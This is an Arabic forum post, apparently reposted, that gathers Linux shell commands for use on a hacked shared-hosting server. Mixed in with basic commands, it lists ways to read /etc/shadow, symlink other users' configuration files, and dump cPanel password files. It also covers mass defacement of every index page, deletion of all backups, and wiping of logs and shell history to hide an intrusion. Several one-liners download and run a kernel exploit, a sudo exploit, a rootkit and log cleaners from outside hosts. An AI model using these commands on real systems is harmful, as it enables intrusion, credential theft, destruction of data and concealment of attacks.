بسم الله الرحمان الرحيم

السلام عليكم
نبدأ على بركة الله


1- أمر إظهار يوزرات المواقع :
ls -la /etc/valiases
او
cat /etc/passwd
او
ls /var/mail
او
cat /etc/shadow
او
cat /etc/domainalias
---------------------------------
ln -s / etc/passwd w
يسحب لك الملف بملف أسمه w
---------------------------------
rm el-3asheq.php <------لحذف ملف
rm -r el-3asheq<------ لحذف مجلد
find el-3asheq.php <------لعمل بحث عن ملف
find *.php <------لعمل بحث عن جميع الملفات بهذا الامتداد
-----------------------------------------
أمر التأكد من صلاحية سحب الملفات علي السيرفر
which xxxx <------ بدل العلامات بأمر السحب
xxxx = أمر السحب
اومر السحب
wget
curl -o
get
lynx -source
---------------------------------------
هذا االامر الي معي حلو يخليك ما تمشور مشوار .... هذا يطلعلك الملفات الي داخل مجلد boot
تقدر تغيير مجلد boot الى
-----------------------------------------------
كود:
cd /boot;ls -al
etc << لفحص بعض الملفات ومنها قد تجد ثغرة confixx
usr << لمعرفة برامج السيرفر
opt < بعض السيرفرات تلقاه بالمجلد الرئيسي بعضها لا
--------------------------------------------
last -20 -a : عرض آخر 20 اسم تم تسجيل دخولهم
ps -ax : عرض الـ Processess
lsmod : الـ modules الموجوده في الكيرنال
uname -a : لعرض معلومات الكرنال
اوامر بسيطه
mv : تغيير الإسم
cp : نسخ ملف
cp -R : نسخ مجلد
ln : إنشاء رابط ( link ) لملف
gerp : البحث داخل ملف
-----------------------------------
لو اردت معرفة هل البورت مفتوح11457 راح اطبق التالي :
netstat -an|grep 11457
---------------------------------------------
امر للتاكد من وجود ملف

كود:
ls file
حلو بدل ما تكتب ls ويطلع لك ملفات وتخش عيونك على بعض
ويمكن تستخدمه للتاكد من وجوده ومعرفه التصريح
كود:
ls -al file
------------------------------------------------
أوامر إحترافيه :
1- إظهار اليوزرات بشكل مرتب :
awk -F: '{ print $1 }' / etc/passwd | sort

2- معرفة البرامج المستخدمه من قبل اليوزر والرووت ( من ضمنها اسم برنامج الاف تي بي )
ps -o "%u : %U : %p : %a"

3- معلومات كامله واحترافيه عن ال processess مع تحديد اليوزر المستخدم للبروسيس
ps -eo pid,tt,user,fname,tmout,f,wchan

4- ال processess ليوزر معين ؟ ( استبدل user فقط في هذا الأمر )
ps -U user -u user -N

5- اليوزرز المتصلين الآن
users

6- عرض آخر اليوزرز اللي دخلو :
last

7- لجلب معلومات عن مستخدم معين ( استبدل user في هذا الأمر )
finger user

8- امر معرفة اسماء اليوزرز المتصلين بالسيرفر .. وافعالهم
w

9- عرض البورتات المفتوحه
netstat -lnp --ip
-------------------------------------------
touch el-3asheq.php ينشئ لك ملف ضمن المجلد
++g : كومبيلر لل C++ و C
gcc : كومبيلر لل C++ و C
grep : يستخدم للبحث عن شئ داخل ملف
gzip : لضغط ملفات
gunzip : لضغط ملفات
وال un لفك الضغط بالاستعانه مع الاوامر اللي فوق مثال : ungzip unzip
haltsys : لاغلاق النظام
cat : لعرض محتوى اكثر من ملف مع بعض
cd : لتغير الدليل الذي انت عليه
chmod : لتغير تصريح دخلول ملف معين
chown : لتغير مالك ملف معين
clear : لمسح كل الذي على الشاشة
cmp : لمقارنة ملفين
cp : لنسخ الملفات
crypt : لتشفير و فك تشفير الملفات
csplit : لتقسيم الملف الى عدة ملفات
cu : لطلب تريمنال يونكس اخر
whoami يقول لك من انت (يعني من انا ) يقول لك root او مستخدم xxx
rm : لمسح ملفات او مجلدات ( خاليه )
rmdir : لمسح مجلد ( خالي )
وفي حال كنت بالترمنال اضغط على زر التاب Tap يعرض لك كل اوامر اللينكس
ومثلاً اي امر تحب تعرف شو هووا فقط اكتب الأمر وبعدها هيلب :
مثال rm --help

--------------------------------------------------
أوامر رائعه :
لمعرفة جميع ملفات اسم مستخدم معين ( استبدل john )
find /home -user john

لمعرفة الملفات اللتي تم تعديلها في خلال الـ 24 ساعه ( أمر مهم )
find $HOME -mtime 0

لمعرفة المساحه المستخدمه
df -h
لمعرفة المساحه المتبقيه
du
-----------------------------------------
وهذي مجموعة من الأوامر البسيطة
ls -m
يظهر الملفات مع تفريقهم بفواصل بدلا من تفريقهم بخانات
ls -t
يظهر الملفات حسب تواريخ إنشائها يعني من الجديد إلى القديم
ls -lu
يظهر الملفات حسب آخر تاريخ زيارة لهذه الملفات (مع تبيين هذا التاريخ)
ls -F
يظهر الملفات بأنواعها حيث :
الملفات المسبوقة ب / عبارة عن مجلدات
الملفات المسبوقة ب * عبارة عن ملفات تنفيذية
الملفات المسبوقة ب @ عبارة عن روابط
ls -S
يظهر الملفات تسلسليا من الأكبر إلى الأصغر
ls -X
يظهر الملفات ويرتبها حسب امتدادها
ls -r
يظهر الملفات مرتبة بالمقلوب (يعني من z ثم y ثم x ....)
cp
لنسخ ملف أو مجلد
mkdir
لإنشاء مجلد
mv
لتحويل ملف من مجلد إلى مجلد أو إعادة تسميته
(مثلا
mv el-3asheq gnom
راح يعيد تسميت المجلد el-3asheq إلى gnom
أو
mv el-3asheq.php /ho me/hackteach/publi c_htm l/cc/test
راح يحول الملف el-3asheq.php من المجلد إلي هو فيه إلى المجلد الجديد test)
---------------------------------------
ln -sf / home / user / public_html / vb / in clude s / c onfig . php conf.txt
راح يجيب لك نسخـة من ملف الكونفق تبع اليوزر المحدد في الملف الجديد conf.txt
بالعربي ,, الأمر هذا هو حق السم لينك ,, symLink
---------------------------------------
أمر لمعرفة اليوزر اللي مستهلك أكبر مساحه :
du -s / home | sort -rn
( بدون مسافه بعد / و home )
-----------------------------------
النسخ واللصق بهالطريقة
c p /ho me/hi.t xt /ho me/jack
أو العكس
----------------------------
لعمل ماس ديفاس بعد اخذ الروت
كود PHP:
find / -name "index.*" -exec cp /t mp/index.htm
----------------------------------------------
أمر إظهار باسوردات السي بانل ( في حالة كنت روت ) :
في أوامر كثيره .. بعضها :
find / -name service.pwd
او
cat / home/*/public_html/_vti_pvt/service.pwd

و

cat / var/cpanel/accounting.log
( لاتنسى تحذف المسافات قبل var و home )
---------------------------------------------
1- حذف ملفات اللوقو
rm -rf / tmp/logs
rm -rf $HISTFILE
rm -rf / root/.ksh_history
rm -rf / root/.bash_history
rm -rf / root/.ksh_history
rm -rf / root/.bash_logout
rm -rf / usr/local/apache/logs
rm -rf / usr/local/apache/log
rm -rf / var/apache/logs
rm -rf / var/apache/log
rm -rf / var/run/utmp
rm -rf / var/logs
rm -rf / var/log
rm -rf / var/adm
rm -rf / etc/wtmp
rm -rf / etc/utmp
find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;

2- أمر تعديل ملفات اللوقو ( إخفائها .. آمن )
cat / dev/null > / var/log/kdebug
cat / dev/null > / var/log/kernel
cat / dev/null > / var/log/maillog
cat / dev/null > / var/log/messages
cat / dev/null > / var/log/secure
cat / dev/null > / var/log/svclog
cat / dev/null > / var/log/tcdebuglog
cat / dev/null > / var/log/tclient
cat / dev/null > / var/log/tivoLog.prv
cat / dev/null > / var/log/tivoLog.pub
cat / dev/null > / var/log/tivoweb.log
cat / dev/null > / var/log/tvdebuglog
cat / dev/null > / var/log/tverr
cat / dev/null > / var/log/tvlog
3- أمر قرائة ملف الكونفيج على السيرفر
cat / usr/local/apache/conf/httpd.conf
4- أمر عرض الملفات Suid ( ملفات من قبل الروت لكن يستطيع اليوزر تشغيلها )
find / -type f -perm -04000 -ls

5- أمر عرض الملفات Sgid ( ملفات من قبل الروت لكن تستطيع المجموعه تشغيلها )
find / -type f -perm -02000 -ls
6- أوامر عرض المجلدات المصرح لها تصريح 777
find / -perm -2 -ls
find / -type d -perm 0777 | xargs ls -alld
find / -type d -pem -2 -ls
7- أمر حذف جميع الباك آب الموجوده على السيرفر
find / -name "cpbackup*" -exec rm {} ;
find / -name "backup*" -exec rm {} ;
8- أمر إستبدال جميع الإندكسات إلى الإندكس الموجود على المسار الحالي
find / -name "index.*" -exec cp index.htm {} ;
find / -name "default.*" -exec cp index.htm {} ;
9- أمر تعديل صلاحيات الإندكسات إلى nobody ( لكي لا يشك اليوزر )
find / -name "index.*" -exec chown 99 index.html {} ;
find / -name "default.*" -exec chown 99 index.html {} ;
10- أمر عرض System log
cat / etc/syslog.conf
11- أمر عرض معلومات عن الذاكره
cat / proc/meminfo
12- أمر تعديل دوال php والسيف مود وغيرها
pico / usr/local/lib/php.ini
13- أمر عرض البورتات المفتوحه
netstat -atup | grep IST
14- أمر عرض آخر إتصال
lastlog
15- أمر عرض اليوزرات المتصله
w
16- أمر لمعرفة إصدار الكيرنال
dpkg --list | grep linux-image
rpm -q kernel : kernel-2.6.18-53.1.4.el5
uname -s : SunOS
uname -r : 2.6.22-14-EL5
uname -mrsn : Linux s.server.com 2.6.18-53.1.4.el5 x86_64
cat / proc/version : Linux version 2.6.18-53.1.4.el5 ([email protected]) (gcc version 4.1.2 20070626 (Red Hat 4.1.2-14)) #1 SMP Wed Nov 14 10 27 EST 2007
17- أمر إيقاف process معين عن العمل
kill -9 PID
kill PID
مع إستبدال PID لرقم البروسيس .. تستطيع معرفته عن طريق الأمر
ps ux
ps aux
top
18- أمر عرض الأوامر ( او بالأصح الملفات التنفيذيه ) اللتي عليها Suid ( يستطيع اليوزر تشغيلها )
find / bin / usr/bin / usr/local/bin / sbin / usr/sbin / usr/local/sbin -perm -4000 2> / dev/null
19- أمر عرض اليوزرات اللتي لا تحتوي على باسورد
cut -d: -f1,2,3 / etc/passwd | grep ::

20- أمر عرض الملفات اللتي تريد الكتابه عليها في مجلد etc
find / etc/ -type f -perm -o+w 2> / dev/null
21- أمر عرض أوامر السحب المفعله كـ wget
which wget curl w3m lynx
22- أمر عرض معلومات عن المعالج CPUINFO
cat / proc/version / proc/cpuinfo
23- أمر عرض مساحات الهاردسك
du
( ملاحظه : تستطيع إستخدامه مع option اخرى .. لاحظ الأوامر التاليه )
du -s / home/user | sort -rn
df -Th
24- أمر التأكد من وجود المترجم gcc
locate gcc
25- أمر إستخدام Wipelogs ( للتعديل على الوقو .. أمن )
wget http://www.packetstormsecurity.org/U...-wipers/zap2.c | gcc zap2.c -o zap2 | ./zap2
26- أمر تنفيذ بعض الهجمات على الكيرنال
wget http://ftp.powernet.com.tr/supermail/debug/k3 | ./k3 1 | ./k3 2 | ./k3 3 | ./k3 4 | ./k3 5
27- إستخدام ثغرة stack overflow عن طريق sudo
wget http://precision-gaming.com/sudo.c | gcc sudo.c -o sudosploit | ./sudosploit
28- أمر تثبيت روت كت لإصدار 2.6
wget http://twofaced.org/linux2-6-all.c | gcc linux2-6-all.c -o linuxkernel | ./linuxkernel
29- أمر استخدام سكربت Mig LogCleaner
wget http://twofaced.org/mig-logcleaner.c | gcc -DLINUX -WALL mig-logcleaner.c -o migl | ./migl -u root 0
30- أمر لمعرفة الملفات والمجلدات اللتي تم تعديلها في خلال X يوم
find / -mtime x
( ملاحظه : استبدل time إلى min للبحث في الدقائق .. ليصلح mmin )
31- أمر لمعرفة الملفات والمجلدات اللتي تم تعديل خصائصها ( كـ الملكيه ) في خلال X يوم
find / -ctime x
32- للبحث عن الملفات اللتي مالكها root لكن يستطيع اليوزر تنفيذها
find / -perm +4000 -user root
33- للبحث عن الملفات اللتي مالكها root لكن يستطيع اليوزر الكتابه عليها
find / -perm +002 -user root
34- للبحث عن الملفات اللتي ليس لديها مالك
find / -nouser
35- للبحث عن الملفات اللتي مالكها هو اليوزر root
find / -user root
36- من الأوامر التفصيليه لـ find
find / -name "*.txt" -size +10k -user root -not -perm +o=r -exec chmod o+r {} \;
شرح الأمر :
ابحث في جميع المجلدات .. عن اي ملف نصي امتداده txt
وحجمه أكثر من 10 كيلو بايت .. وصاحبه اليوزر root
وغير قابله للقراءه من اي يوزر اخر ماعدا مالكها الأصلي
يستطيع صاحبها قرائتها وويستطيع تنفيذها ( execution ) ( ورمزه -r-xr--r-- )

37- وتستطيع إستخدام أمر find بشكل آخر .. مثل :
find / -type f \( -perm -04000 -o -perm -02000 \) \-exec ls -lg {} \;
شرح الأمر :
عرض جميع الملفات فقط .. اللتي لديها خاصيتي SetUID و SetGID بشكل مفصل


للأمانة منقول
مع تحيات
جوك 17 JOK